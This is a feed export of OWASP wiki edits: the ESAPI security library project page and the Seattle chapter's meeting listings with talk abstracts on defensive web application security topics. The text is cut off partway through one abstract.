https://wiki.owasp.org/api.php?action=feedcontributions&feedformat=atom&user=McurpheyOWASP - User contributions [en]2026-04-24T00:27:11ZUser contributionsMediaWiki 1.27.2https://wiki.owasp.org/index.php?title=Category:OWASP_Enterprise_Security_API&diff=130445Category:OWASP Enterprise Security API2012-05-23T21:32:33Z<p>Mcurphey: </p>
<hr />
<div>= Home =<br />
<br />
{| width="100%"<br />
|-<br />
! width="66%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
ESAPI (The OWASP Enterprise Security API) is a free, open source, web application security control library that makes it easier for programmers to write lower-risk applications. The ESAPI libraries are designed to make it easier for programmers to retrofit security into existing applications. The ESAPI libraries also serve as a solid foundation for new development. <br />
<br />
Allowing for language-specific differences, all OWASP ESAPI versions have the same basic design: <br />
<br />
*'''There is a set of security control interfaces.''' They define for example types of parameters that are passed to types of security controls.<br />
<br />
*'''There is a reference implementation for each security control.''' The logic is not organization‐specific and the logic is not application‐specific. An example: string‐based input validation.<br />
<br />
*'''There are optionally your own implementations for each security control.''' There may be application logic contained in these classes which may be developed by or for your organization. An example: enterprise authentication.<br />
<br />
This project source code is licensed under the [http://en.wikipedia.org/wiki/BSD_license BSD license], which is very permissive and about as close to public domain as is possible. The project documentation is licensed under the [http://creativecommons.org/licenses/by-sa/2.0/ Creative Commons] license. You can use or modify ESAPI however you want, even include it in commercial products.<br />
<br />
The following organizations are a few of the many organizations that are starting to adopt ESAPI to secure their web applications: [http://www.americanexpress.com/ American Express], [http://www.apache.org/ Apache Foundation], [http://www.boozallen.com Booz Allen Hamilton], [http://www.aspectsecurity.com/ Aspect Security], [http://www.coraid.com Coraid], [http://www.thehartford.com/ The Hartford], [http://www.infinitecampus.com Infinite Campus], [http://www.lockheedmartin.com/ Lockheed Martin], [http://cwe.mitre.org/top25/index.html MITRE], [http://enterprise.spawar.navy.mil/ U.S. Navy - SPAWAR], [http://www.worldbank.org/ The World Bank], [http://www.sans.org/top25errors/ SANS Institute]. <br />
<br />
Please let us know how your organization is using OWASP ESAPI. Include your name, organization's name, and brief description of how you are using it. The project lead can be reached [mailto:jeff.williams@owasp.org here]. <br />
<br />
| <br />
[[Image:Esapi-sponsors.PNG]] <br />
<br />
|}<br />
<br />
{| width="100%"<br />
|-<br />
! width="33%" | <br />
! width="33%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
== Let's talk here ==<br />
<br />
[[Image:Asvs-bulb.jpg]]'''ESAPI Communities''' <br />
<br />
Further development of ESAPI occurs through mailing list discussions and occasional workshops, and suggestions for improvement are welcome. For more information, please subscribe to one of the lists below.<br />
<br />
*[https://lists.owasp.org/mailman/listinfo/esapi-dev esapi-dev mailing list (this is the main list)] <br />
*[https://lists.owasp.org/mailman/listinfo/esapi-user esapi-user mailing list] <br />
*[https://lists.owasp.org/mailman/listinfo/esapi-php esapi-php mailing list] <br />
*[https://lists.owasp.org/mailman/listinfo/esapi-python esapi-python mailing list] <br />
*[https://lists.owasp.org/mailman/listinfo/owasp-esapi-ruby esapi-ruby mailing list] <br />
*[https://lists.owasp.org/mailman/listinfo/owasp-esapi-swingset esapi-swingset mailing list]<br />
*[http://groups.google.com/group/cfesapi esapi-coldfusion mailing list]<br />
<br />
IRC Chat<br />
<br />
If you would rather chat with us about your problem or thoughts - you can join us in our IRC channel using an [http://www.google.com/search?q=irc+client IRC Client] or using FreeNode's [http://webchat.freenode.net WebChat] client.<br />
<br />
*Server: irc.freenode.net<br />
*Channel: #esapi<br />
<br />
|<br />
<br />
== Got developer cycles? ==<br />
<br />
[[Image:Asvs-waiting.JPG]]'''ESAPI Coding''' <br />
<br />
The ESAPI project is always on the lookout for volunteers who are interested in contributing developer cycles. <br />
<br />
*[http://owasp-esapi-php.googlecode.com/files/esapi4php-contributing.pdf ESAPI for PHP Developer Onboarding Instructions] <br />
*ESAPI for other languages developer onboarding instructions -- coming soon!<br />
<br />
| <br />
== Related resources ==<br />
<br />
[[Image:Asvs-satellite.jpg]]'''OWASP Cheat Sheet Series''' <br />
<br />
*[[SQL Injection Prevention Cheat Sheet]] <br />
*[[XSS (Cross Site Scripting) Prevention Cheat Sheet]] <br />
*[[Cryptographic Storage Cheat Sheet]]<br />
*[[Authentication Cheat Sheet]]<br />
*[[Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet]]<br />
*[[Transport Layer Protection Cheat Sheet]]<br />
<br />
|}<br />
<br />
= Downloads =<br />
<br />
{| width="100%"<br />
|-<br />
! width="33%" | <br />
! width="33%" | <br />
|- valign="top"<br />
| <br />
[[Image:Asvs-step1.jpg]]'''1. About ESAPI''' <br />
<br />
*Data sheet([http://www.owasp.org/images/8/81/Esapi-datasheet.pdf PDF],[http://www.owasp.org/images/3/32/Esapi-datasheet.doc Word]) <br />
*Project presentation ([http://owasp-esapi-java.googlecode.com/files/OWASP%20ESAPI.ppt PowerPoint]) <br />
*Video presentation ([http://www.youtube.com/watch?v=QAPD1jPn04g YouTube])<br />
<br />
[[Image:Asvs-step2.jpg]]'''2. Get ESAPI''' <br />
<br />
*[http://code.google.com/p/owasp-esapi-java/downloads/list ESAPI for Java Downloads] <br />
*{{#switchtablink:.NET|ESAPI for .NET}}<br> <br />
*{{#switchtablink:Classic ASP|ESAPI for Classic ASP}}<br> <br />
*{{#switchtablink:PHP|ESAPI for PHP}}<br> <br />
*{{#switchtablink:ColdFusion.2FCFML|ESAPI for ColdFusion & CFML}}<br> <br />
*{{#switchtablink:Python|ESAPI for Python}}<br> <br />
*[http://code.google.com/p/owasp-esapi-js/downloads/detail?name=esapi4js-0.1.3.zip ESAPI for Javascript]<br><br />
<br />
| <br />
[[Image:Asvs-step3.jpg]]'''3. Learn ESAPI''' <br />
<br />
*ESAPI design patterns (not language-specific): [http://www.owasp.org/images/8/82/Esapi-design-patterns.pdf (PDF], [http://www.owasp.org/index.php/File:Esapi-design-patterns.doc Word], [http://www.owasp.org/images/8/87/Esapi-design-patterns.ppt PPT)] <br />
*The [[ESAPI Swingset|ESAPI Swingset]] sample application demonstrates how to leverage ESAPI to protect a web application. <br />
*LAMP should be spelled LAMPE ([http://www.owasp.org/images/a/ac/LAMP_Should_be_Spelled_LAMPE.pdf PDF]) <br />
*ESAPI for Java interface documentation ([http://owasp-esapi-java.googlecode.com/svn/trunk_doc/index.html JavaDocs]) <br />
*ESAPI for PHP interface documentation ([http://owasp-esapi-php.googlecode.com/svn/trunk_doc/latest/index.html phpdoc])<br />
<br />
|}<br />
<br />
<br />
= What I did with ESAPI =<br />
<br />
*I used ESAPI for Java with Google AppEngine. I used it for simple validation and encoding. --[mailto:jeff.williams@owasp.org Jeff]<br />
<br />
*I used ESAPI for PHP with a custom web 2.0 corporate knowledge management application, made up of many open source and commercial applications integrated to work together. I added an organization- and application-specific "Adapter" control to wrap calls to the other ESAPI controls. --[mailto:mike.boberski@owasp.org Mike]<br />
<br />
*I used ESAPI for Java’s "Logger" control to make it easier for a US Government customer to meet C&amp;A requirements. --[mailto:dave.wichers@owasp.org Dave]<br />
<br />
*I used ESAPI for Java to build a low risk web application that was over 250,000+ lines of code in size. --[mailto:jim.manico@owasp.org Jim]<br />
<br />
*I used ESAPI for Java's "Authenticator" to replace a spaghetti-like mechanism in a legacy financial services web application. In hindsight I should have used the application-specific "Adapter" pattern mentioned by Mike above. The organization also uses the ESAPI Encryptor as an interface to a hardware security module. --[mailto:roman.hustad@yahoo.com Roman]<br />
<br />
*I use ESAPI for Java to educate developers about application security principals at several of the world’s largest organizations. --[mailto:jim.manico@owasp.org Jim]<br> <br />
<br />
= Glossary =<br />
<br />
[[Image:Asvs-letters.jpg]]'''ESAPI Terminology''' <br />
<br />
*'''adapter''' - There are optionally your own implementations for each security control. There may be application logic contained in these classes which may be developed by or for your organization. The logic may be organization-specific and/or application-specific. There may be proprietary information or logic contained in these classes which may be developed by or for your organization. <br />
*'''built-in singleton design pattern''' - The "built-in" singleton design pattern refers to the replacement of security control reference implementations with your own implementations. ESAPI interfaces are otherwise left intact. <br />
*'''codec''' - ESAPI encoder/decoder reference implementations. <br />
*'''core''' - The ESAPI interfaces and reference implementations that are not intended to be replaced with enterprise-specific versions are called the ESAPI Core. <br />
*'''exception''' - ESAPI exception reference implementations. <br />
*'''extended factory design pattern''' - The "extended" factory design pattern refers to the addition of a new security control interface and corresponding implementation, which in turn calls ESAPI security control reference implementations and/or security control reference implementations that were replaced with your own implementations. The ESAPI locator class would be called in order to retrieve a singleton instance of your new security control, which in turn would call ESAPI security control reference implementations and/or security control reference implementations that were replaced with your own implementations. <br />
*'''extended singleton design pattern''' - The "extended" singleton pattern refers to the replacement of security control reference implementations with your own implementations and the addition/modification/subtraction of corresponding security control interfaces. <br />
*'''ES-enable (or ESAPI-enable)''' - Just as web applications and web services can be Public Key Infrastructure (PKI) enabled (PK-enabled) to perform for example certificate-based authentication, applications and services can be OWASP ESAPI-enabled (ES-enabled) to enable applications and services to protect themselves from attackers. <br />
*'''filter''' - In ESAPI for Java, there is additionally an HTTP filter that can be called separately from the other controls. <br />
*'''interfaces''' - There is a set of security control interfaces. There is no application logic contained in these interfaces. They define for example types of parameters that are passed to types of security controls. There is no proprietary information or logic contained in these interfaces. <br />
*'''locator''' - The ESAPI security control interfaces include an "ESAPI" class that is commonly referred to as a "locator" class. The ESAPI locator class is called in order to retrieve singleton instances of individual security controls, which are then called in order to perform security checks (such as performing an access control check) or that result in security effects (such as generating an audit record). <br />
*'''reference implementation''' - There is a reference implementation for each security control. There is application logic contained in these classes, i.e. contained in these interface implementations. However, the logic is not organization-specific and the logic is not application-specific. There is no proprietary information or logic contained in these reference implementation classes. <br />
*'''Web Application Firewall (WAF)''' - In ESAPI for Java, there is additionally a Web Application Firewall (WAF) that can be called separately from the other controls.<br />
<br />
<br> <br />
<br />
= Java EE =<br />
<br />
{{:GPC_Project_Details/OWASP_Enterprise_Security_API_Java_EE_Version | OWASP Project Identification Tab}} <br />
<br />
= Dot NET =<br />
<br />
{{:GPC_Project_Details/OWASP_Enterprise_Security_API_.NET_Version | OWASP Project Identification Tab}} <br />
<br />
= Classic ASP =<br />
<br />
{{:GPC_Project_Details/OWASP_Enterprise_Security_API_-_Classic_ASP_Version | OWASP Project Identification Tab}} <br />
<br />
= PHP =<br />
<br />
{{:GPC_Project_Details/OWASP_Enterprise_Security_API_-_PHP_Version | OWASP Project Identification Tab}} <br />
<br />
= ColdFusion CFML =<br />
<br />
<!---{{:GPC_Project_Details/OWASP_Enterprise_Security_API_-_ColdFusion/CFML | OWASP Project Identification Tab}}---> <br />
{{:Projects/OWASP ESAPI for ColdFusion - CFML Project | Project About}}<br />
<br />
= Python =<br />
<br />
{{:GPC_Project_Details/OWASP_Enterprise_Security_API_-_Python_Version | OWASP Project Identification Tab}} <br />
<br />
= JavaScript =<br />
<br />
{{:GPC_Project_Details/OWASP_Enterprise_Security_API_JavaScript_Version | OWASP Project Identification Tab}} <br />
<br />
= Objective C =<br />
<br />
{{:Projects/OWASP ESAPI Objective - C Project | Project About}}<br />
<br />
= Force com =<br />
<br />
{{:GPC_Project_Details/OWASP_Enterprise_Security_API_-_Force.com_Version | OWASP Project Identification Tab}} <br />
<br />
= Ruby =<br />
<br />
{{:Projects/Owasp Esapi Ruby | Project About}} <br />
<br />
= Swingset =<br />
<br />
The ESAPI Swingset Project divides itself into sub-projects, i.e., [[Projects/OWASP ESAPI Swingset Interactive Project|Swingset Interactive]] and [[Projects/OWASP ESAPI Swingset Demo Project|Swingset Demo]]. <br />
<br />
= ESAPI C =<br />
<br />
{{:Projects/OWASP ESAPI C Project | Project About}} <br />
<br />
= ESAPI CPP =<br />
<br />
{{:Projects/OWASP ESAPI C++ Project | Project About}} <br />
<br />
= ESAPI Perl =<br />
<br />
{{:Projects/OWASP ESAPI Perl Project | Project About}} <br />
<br />
= Project Details =<br />
<br />
{{:GPC_Project_Details/OWASP_Enterprise_Security_API | OWASP Project Identification Tab}} <br />
<br />
__NOTOC__ <headertabs /> <br><br />
<br />
{{OWASP Builders}}</div>Mcurpheyhttps://wiki.owasp.org/index.php?title=Seattle&diff=119196Seattle2011-10-17T03:41:49Z<p>Mcurphey: </p>
<hr />
<div>{{Chapter Template|chaptername=Seattle|extra=The chapter leader is [mailto:mark@curphey.com Mark Curphey] ([http://www.twitter.com/curphey @curphey]). We meet monthly usually in downtown Seattle an manage our events using MeetUp. You must RSVP to attend meetings using [http://www.meetup.com/Seattle-Open-Web-Application-Security-Project-OWASP-Chapter/ Meetup]. The chapter has a Twitter account [http://www.twitter.com/owaspseattle @owaspseattle] for local and event news.<br />
<br />
|mailinglistsite=http://lists.owasp.org/mailman/listinfo/owasp-seattle|emailarchives=http://lists.owasp.org/pipermail/owasp-seattle}}<br />
<br />
<br />
== Next Meeting - November 17th, 2011 ==<br />
<br />
[http://www.meetup.com/Seattle-Open-Web-Application-Security-Project-OWASP-Chapter/events/37444702/ Register for this event]<br />
<br />
Talk : [http://blogs.adobe.com/asset/2011/04/nosql-but-even-less-security.html No SQL and even less security].<br />
Speaker : Bryan Sullivan<br />
<br />
Location : <br />
KPMG, Suite 900<br />
801 second avenue<br />
Seattle, WA<br />
<br />
Time : 6pm to 8pm<br />
<br />
To attend this meeting you must RSVP via the Meetup page due to limited spaces. <br />
<br />
[http://www.meetup.com/Seattle-Open-Web-Application-Security-Project-OWASP-Chapter/events/37444702/ Register for this event]<br />
<br />
== December Meeting ==<br />
<br />
The December meeting is being scheduled now but will be help on December 15th at Googles offices in Freemont. <br />
<br />
==Past Events==<br />
<br />
<br />
=== Previous Event 11 August (Wednesday) ===<br />
'''Location:''' Bellevue Las Margaritas<br />
<br />
437 108th Ave NE<br />
<br />
Bellevue, WA 98004<br />
<br />
(425) 453-0535<br />
<br />
'''Date:''' 8/11/2010 @ 6:30ish<br />
<br />
''Presentations:''<br />
<br />
'''How OWASP Works and Guided Tour of OWASP Projects'''<br />
<br />
'''Speaker: Dinis Cruz'''<br />
<br />
This presentation will focus on my experience in getting things done at OWASP, what resources are available and what types of initiatives should the local chapters be doing. In addition to a quick overview of a number of key OWASP projects, this talk will also provide a tutorial on how the OWASP WIKI (MediaWiki based) can be used as a database (using the MediaWiki templates technology)<br />
<br />
--------------------------------------------------------<br />
<br />
'''Using the O2 Platform to Consume OWASP projects'''<br />
<br />
'''Speaker: Dinis Cruz'''<br />
<br />
This presentation will focus on how to consume the OWASP Wiki and a number of OWASP projects using the OWASP O2 Platform. The O2 Platform has powerful technology and capabilities for both BlackBox and WhiteBox analysis and this presentation will provide examples on how to use O2 with: WebGoat, WebScarab, Code Crawler, Dir Buster, Testing Guide, Code Review Guide and OpenSAMM<br />
<br />
<br />
The O2 Platform is focused on automating application security knowledge and workflows. It is specifically designed for developers and security consultants to be able to perform quick, effective and thorough 'source-code-driven' application security reviews (BlackBox + WhiteBox). In addition to the manual findings created/discovered by security consultants, the OWASP O2 Platform allows the easy consumption of results from multiple OWASP projects and commercial scanning tools. This allows security consultants to find, exploit and automate (via Unit Tests) security vulnerabilities usually dismissed by the community as impossible to find/recreate. More importantly, it provides the Security Consultants a mechanism to: a) 'talk' with developers (via UnitTest) , b) give developers a way to replicate + "check if it's fixed" the vulnerabilities reported and c) engage on a two-way conversion on the best way to fix/remediate those vulnerabilities.<br />
<br />
'''Dinis Cruz''' is a Security Consultant based in London (UK) and specialized in: ASP.NET/J2EE Application Security, Application Security audits and .NET Security Curriculum Development.<br />
<br />
For the past years Dinis has focused on the field of Static Source Code analysis, from May 2007 to Dec 2009 he worked as a independent consultant for Ounce Labs (bought by IBM in July 2009) where during active security engagements using Ounce's technology he developed the Open Source codebase which now is the foundation of the OWASP O2 Platform.<br />
<br />
Dinis is currently focused on making the O2 Platform the industry standard for consuming, instrumenting and data-sharing between the multiple WebAppSec tools, the Security consultants and the final developers.<br />
<br />
Dinis is a also active trainer on .Net security having written and delivered courses for IOActive, Foundstone, Intense School and KPMG (at multiple locations including BlackHat), and has delivered a number of presentations and keynote speeches at multiple OWASP and Security related conferences<br />
<br />
At OWASP, Dinis is the leader of the OWASP O2 Platform project, member of the OWASP Global Projects Committee, chair of the OWASP Connections Committee and member of the OWASP Board<br />
<br />
<br />
=== Previous Event 28 April (Wednesday) ===<br />
'''Location:''' Bellevue Las Margaritas<br />
<br />
437 108th Ave NE<br />
<br />
Bellevue, WA 98004<br />
<br />
(425) 453-0535<br />
<br />
'''Date:''' 4/28/2010 @ 6:30ish<br />
<br />
''Presentations:''<br />
<br />
'''When Tools Are Not Enough – Best Practices for Securing Web Applications'''<br />
<br />
'''Speakers:''' Walter Pearce & Wade Winright from IOActive<br />
<br />
The demands of regulatory compliance may have you looking to vulnerability scanning tools in the hopes of finding a silver bullet to examine your web applications. However, it is not realistic to expect scanners alone to accurately determine the impact of the web application vulnerabilities they detect. In this presentation, Walter Pearce and Wade Winright will discuss best practices for securing web applications, including how to effectively utilize tools in conjunction with penetration testing.<br />
<br />
'''Walter Pearce''' is a Senior Security Consultant at IOActive, experienced in enterprise-level application assessment and consultation. At IOActive he performs penetration testing, identifies system vulnerabilities, and designs custom security solutions for clients in software development, telecommunications, financial services, and professional services. Pearce has performed security assessments and IT security support services for many companies in the Fortune 100, including involvement in the largest existing penetration test of a major educational institution. He regularly leads IOActive training courses on numerous topics that include web application security, secure coding in C# or C++, and threat modeling.<br />
<br />
'''Wade Winright''' is a Security Consultant at IOActive, experienced in security testing, and network and systems installation and configuration. At IOActive he performs vulnerability and enterprise risk assessments of application, systems, and infrastructure, and designs custom security solutions for clients in software development, telecommunications, financial services, and professional services.<br />
Winright is a SANS GIAC Certified Incident Handler with a focus on incident handling and hacker tools/techniques, and also is certified by the E-Commerce Council CEH, focused on vulnerability/penetration testing and countermeasures.<br />
<br />
----<br />
<br />
'''Protecting Your Applications from Backdoors:'''<br />
<br />
How to Secure Your Business Critical Applications from Time Bombs, Backdoors & Data<br />
<br />
'''Speaker:''' Clint Pollock from Veracode<br />
<br />
With the increasing practice of outsourcing and using 3rd party libraries, it is nearly impossible for an enterprise to identify the pedigree and security of the software running its business critical applications. As a result backdoors and malicious code are increasingly becoming the prevalent attack vector used by hackers. Whether you manage internal development activities, work with third party developers or are developing a COTS application for enterprise, your mandate is clear- safeguard your code and make applications security a priority for internal and external development teams. In this session we will cover;<br />
Prevalence of backdoors and malicious code in third party attacks<br />
Definitions and classifications of backdoors and their impact on your applications<br />
Methods to identify, track and remediate these vulnerabilities<br />
<br />
'''Clint Pollock''' is a Senior Solutions Architect at Veracode. Since 1997, he has also created security solutions for large-scale enterprise environments on behalf of CREDANT Technologies and Netegrity. In his current role, Clint helps globally distributed organizations evaluate, track, and mitigate their online business risk. Clint's greatest strengths are his enthusiasm, experience and determination to help customers succeed in maintaining secure, compliant systems, and avoid the consequences and bad headlines that come with application security breaches. Clint resides in Chicago, IL.<br />
<br />
=== Previous Event 3 February (Wednesday) ===<br />
'''Location:''' Bellevue Las Margaritas<br />
<br />
437 108th Ave NE<br />
<br />
Bellevue, WA 98004<br />
<br />
(425) 453-0535<br />
<br />
'''Date:''' 2/3/2010 @ 6:30ish<br />
<br />
'''Speakers:''' <br />
<br />
'''Speaker: Hidetake Jo'''<br />
<br />
'''Same Origin Policy'''<br />
<br />
'''Presentations:'''<br />
<br />
[[File:SameOriginPolicy.ppt]] - Same Origin Policy slide deck<br />
<br />
[[File:Rendezvous.ppt]] - Presentation on the Rendezvous toolset<br />
<br />
Same origin policy is a simple and important security policy which protects millions of users on the web. Often times the policy is over simplified and there is a misconception that there is one consistent policy being used across all web technologies. Unfortunately this can’t be further from the truth. Different browser brands, RIA plugins, various scripting languages and features within the browser environment have their own interpretation of the same origin policy. Not understanding the subtle differences can be catastrophic to web security. This presentation tries to summarize the deltas in the same origin policy. This is also a call for action to involve the community to more comprehensively document the policies. <br />
<br />
'''Hidetake Jo''' is part of the Trustworthy Computing team in Office. He works with teams throughout Office to identify threats and ways to mitigate those threats, he also gets to break stuff. Hidetake has written many penatration testing tools that are used throughout Microsoft.<br />
<br />
-----------------------------------------------<br />
<br />
'''Speaker: Pravir Chandra'''<br />
<br />
'''Open Software Assurance Maturity Model (OpenSAMM)'''<br />
<br />
'''Presentation:''' <br />
<br />
Slide deck can be found [http://www.opensamm.org/downloads/OpenSAMM-1.0.ppt here]<br />
<br />
The Open Software Assurance Maturity Model (SAMM) (http://www.opensamm.org/) is a flexible and prescriptive framework for building security into a software development organization. Covering more than typical SDLC-based models for security, SAMM enables organizations to self-assess their security assurance program and then use recommended roadmaps to improve in a way that's aligned to the specific risks facing the organization. Beyond that, SAMM enables creation of scorecards for an organization's effectiveness at secure software development throughout the typical governance, development, and deployment business functions. Scorecards also enable management within an organization to demonstrate quantitative improvements through iterations of building a security assurance program. This workshop will introduce the SAMM framework and walk through useful activities such as assessing an assurance program, mapping an existing organization to a recommended roadmap, and iteratively building an assurance program. Time allowing, additional case studies will also be discussed. OpenSAMM is an open a free project and has recently been donated to the Open Web Application Security Project (OWASP) Foundation. For more information on OpenSAMM, visit http://www.opensamm.org/.<br />
<br />
'''Pravir Chandra''' is Director of Strategic Services at Fortify Software and works with clients on software security assurance programs. Pravir is recognized for his expertise in software security, code analysis, and his ability to strategically apply technical knowledge. Prior to Fortify, he was a Principal Consultant affiliated with Cigital and led large software security programs at Fortune 500 companies. Pravir Co-Founded Secure Software, Inc. and was Chief Security Architect prior to its acquisition by Fortify. He recently created and led the Open Software Assurance Maturity Model (OpenSAMM) project with the OWASP Foundation, leads the OWASP CLASP project, and also serves as member of the OWASP Global Projects Committee. Pravir is author of the book Network Security with OpenSSL. <br />
<br />
=== Previous Event 11 August (Tuesday) ===<br />
'''Location:''' Bellevue Las Margaritas<br />
<br />
437 108th Ave NE<br />
<br />
Bellevue, WA 98004<br />
<br />
(425) 453-0535<br />
<br />
'''Date:''' 8/11/2009 @ 6:30ish<br />
<br />
'''Speakers:'''<br />
<br />
'''Speaker: Anil Kumar Revuru'''<br />
<br />
'''Slides: ''' [[file:Anti-XSS_3.0_RV.pptx]]<br />
<br />
'''The Microsoft Anti-Cross-Site Scripting Library'''<br />
<br />
The Microsoft Anti-Cross-Site Scripting Library V3.0 (Anti-XSS V3.0) is an encoding library designed to help developers protect their ASP.NET web-based applications from XSS attacks. It differs from most encoding libraries in that it uses the white-listing technique — sometimes referred to as the principle of inclusions — to provide protection against XSS attacks. This approach works by first defining a valid or allowable set of characters, and encodes anything outside this set (invalid characters or potential attacks). The white listing approach provides several advantages over other encoding schemes. The following are some new features of Anti-XSS library v3.0.<br />
* An expanded white list that supports more languages<br />
*Performance improvements<br />
*Performance data sheets (in the online help)<br />
*Support for Shift_JIS encoding for mobile browsers<br />
*Security Runtime Engine (SRE) HTTP module<br />
*A sample application<br />
<br />
In this session, we will learn in-depth how Anti-XSS works and learn more about its new features.<br />
<br />
'''Anil Kumar Revuru''' currently works for Information Security Tools team in Microsoft as Senior SDE where he is responsible for architecting security tools. In his previous life at Microsoft, Anil conducted security design reviews, threat modeling, and application and source-code assessments. He has authored security tools and has presented security courses internally at Microsoft. He excelled in his abilities by developing security tools such as Microsoft Threat Analysis and Modeling Tool and Anti-XSS Library. Anil holds a Diploma in Mechanical Engineering from JNTU Hyderabad. Anil displayed expert proficiency in the substantive and technical areas of design and development. Has keen interest in photography, xbox and computer hardware.<br />
<br />
-----------------------------------------------<br />
<br />
'''Speaker: Andre Gironda'''<br />
<br />
'''Using ASVS with the Code Review Guide, Testing Guide, and Time Management'''<br />
<br />
The OWASP Application Security Verification Standards, which defines<br />
four levels of web application security verification, lays down a<br />
framework for security architecture review. While the ASVS includes<br />
many requirements for controls, it does not suggest which tools,<br />
techniques, timeline or methodologies to utilize. The OWASP Code<br />
Review and Testing Guides provide the technical practices and suggest<br />
or hint at tools, but also lack the timeline and methodology necessary<br />
to complete an application penetration-test or SDLC integration<br />
project for proper application security hygiene.<br />
<br />
This presentation will provide the 1000 foot view all the way down to<br />
the nitty gritty details of how to perform ASVS activities using OWASP<br />
resources, as well as some OWASP and non-OWASP tools (freeware or<br />
demoware). Example timelines for typical ASVS activities, including<br />
reports, will be discussed so that any sort of application security<br />
project can be scoped properly, delivered on-time, and within budget.<br />
<br />
'''Andre Girond'''a is an application security specialist with a global<br />
security consulting firm providing IT security services to the Fortune<br />
500 and financial institutions as well as U.S. and foreign<br />
governments. Prior to his current employment, Andre held a number of<br />
payment application security positions in addition to working for the<br />
largest online auction website. He is currently a leader for the Open<br />
Web Application Security Project (OWASP), where he co-produces the<br />
global OWASP News Podcast.<br />
<br />
=== Previous Event 28 April (Tuesday) ===<br />
'''Location:''' Bellevue Las Margaritas<br />
<br />
437 108th Ave NE<br />
<br />
Bellevue, WA 98004<br />
<br />
(425) 453-0535<br />
<br />
'''Date:''' 4/28/2009<br />
<br />
'''Speakers:'''<br />
<br />
'''Speaker: Scott Stender'''<br />
<br />
'''Securing our Legacy - Responding to the call to provide practical security assurance'''<br />
<br />
Every few months witnesses the release of a much-hailed report from an industry organization, think tank, or government agency calling for the software that runs our critical infrastructure to be secured. Making the call is easy, acting on it is only slightly harder, but succeeding at it is incredibly difficult.<br />
<br />
Of all of the tasks that must be undertaken to truly meet the call, the single biggest challenge I have seen companies face is delivering security assurance on legacy code. This talk will explore the challenge of providing security assurance for these old, little-loved, but heroic systems that power our lives. More importantly, It will include guidance for software development managers and engineers seeking to gain insight into the operation of their legacy systems, mechanisms by which important security assertions can be gathered, and practical methods for carrying out penetration tests and code reviews with the aim of providing a high degree of security assurance.<br />
<br />
Scott Stender is a co-founder and Partner of iSEC Partners, a strategic digital security organization. Scott brings with him several years of experience in large-scale software development and security consulting, having worked at @stake and Microsoft in previous lives. <br />
<br />
In his research, Scott focuses on secure software engineering methodology and analysis of core technologies. Scott has been published in publications such as IEEE Security & Privacy, and has presented at Microsoft Blue Hat and at Black Hat conferences on several occasions. Scott holds a BS in Computer Engineering from the University of Notre Dame.<br />
-----------------------------------------------<br />
<br />
'''Speaker: Ashok Misra'''<br />
<br />
'''Application Issues with encryption of PANs'''<br />
<br />
There are unique application issues related to the storage and processing of credit card numbers for ecommerce transaction processing. This talk focuses on issues with the various cryptographic primitives used for PANs.<br />
<br />
Ashok Misra is an Ecommerce professional with more than 10 years experience delivering results for leading ecommerce merchants.<br />
<br />
He is currently Sr. Manager Payments & Security in the Media Applications Platform Development Division for e-Commerce products for Real Networks, Inc in Seattle, Washington. He brings an unusually comprehensive insight into security and payments processing.<br />
<br />
Ashok is responsible for the Billing for Real’s Consumer Divisions. He takes a leadership role in identifying new opportunities in the consumer payments domain. He has extensive hands on experience in merchant integration with several leading payment providers.<br />
<br />
Prior to working with Real Networks he built backend components for ecommerce for Amazon.com.<br />
<br />
He has comprehensive domain knowledge in consumer payments over the internet with Credit Cards, EU Direct Debit , Real time Bank Transfers , Redirect Payment Instruments, Fraud Detection and PCI Compliance.<br />
<br />
=== Previous Event 23 October (Thursday) ===<br />
<br />
'''Location:''' 810 Third Avenue<br />
<br />
Seattle, WA 98104<br />
<br />
Conference room on the first floor <br />
<br />
'''Date:''' 10/23/2008<br />
<br />
'''Time:''' 6:30PM<br />
<br />
'''Speakers:'''<br />
<br />
<br />
'''Speaker: Michael Eddington'''<br />
<br />
'''Fuzzjacking!'''<br />
<br />
Fuzzing is one of the hot new buzzwords in the security industry and<br />
if your clients had not already ask for it they will. This talk will<br />
introduce the subject, talk about different types of fuzzers,<br />
integration into SDL, when to fuzz and also talk a bit about the Peach<br />
Fuzzing Platform. Questions and interaction requested :)<br />
<br />
--------------------------------------------------------------------------------<br />
<br />
Michael Eddington is a founding principal of Leviathan Security Group with over ten years<br />
experience in computer security, with expertise in application and<br />
network security, through threat modeling. Michael founded the<br />
security services practice for IOActive and co-founded the Security<br />
Services Center for Hewlett-Packard's services division. Michael is<br />
also an accomplished software developer, having participated in a<br />
number of open-source security development projects ranging from the<br />
Trike threat modeling conceptual framework to the Peach Fuzzer<br />
Platform.<br />
<br />
<br />
'''Speaker: Chris Weber'''<br />
<br />
'''Exploiting Unicode-enabled Software'''<br />
<br />
This talk will showcase some of the ways that Unicode has been leveraged to cause software to break. We will survey the security issues outlined in Unicode Technical reports 36 and 39. The issues highlighted will be illustrated by examples of historical Unicode-related security flaws in popular software and Web applications. For each vulnerability we will assess the damage that was inflicted, describe how the exploit worked, and discuss the root cause. Examples will include demonstrations of how clever attackers can exploit Unicode-enabled software to run arbitrary code or takeover the machine.<br />
<br />
--------------------------------------------------------------------------------<br />
<br />
Chris Weber co-founded Casaba Security who focuses on security testing for some of the world's leading software development companies and online properties. He has authored several security books, articles and presentations. He has worked as a security researcher and consultant for seven years and has identified hundreds of security vulnerabilities in many widely used software products<br />
<br />
=== Previous Event 12 June (Thursday) ===<br />
'''Location:''' Bellevue Las Margaritas<br />
<br />
437 108th Ave NE<br />
<br />
Bellevue, WA 98004<br />
<br />
(425) 453-0535<br />
<br />
<br />
'''Date:''' 06/12/2008<br />
<br />
'''Time:''' 6:30PM<br />
<br />
'''Speakers:'''<br />
<br />
'''Speaker: Taylor McKinley'''<br />
<br />
'''Dynamic Taint Propagation: Finding Vulnerabilities Without Attacking'''<br />
<br />
Dynamic taint propagation allows testers to find vulnerabilities without modifying existing functional tests. It enables true security testing inside a QA organization because it allows tight integration with existing QA infrastructure and solid usability for non-security experts. This talk will:<br />
<br />
*Explain how dynamic taint propagation works.<br />
*Show how to retrofit an existing executable to perform dynamic taint propagation.<br />
*Demonstrate how a tester can use a typical suite of functional tests to find vulnerabilities, without the need for malicious input or security expertise.<br />
*Compare this approach with the effectiveness of popular penetration testing tools--particularly those acquired by IBM and HP in 2007--when deployed in a QA environment.<br />
<br />
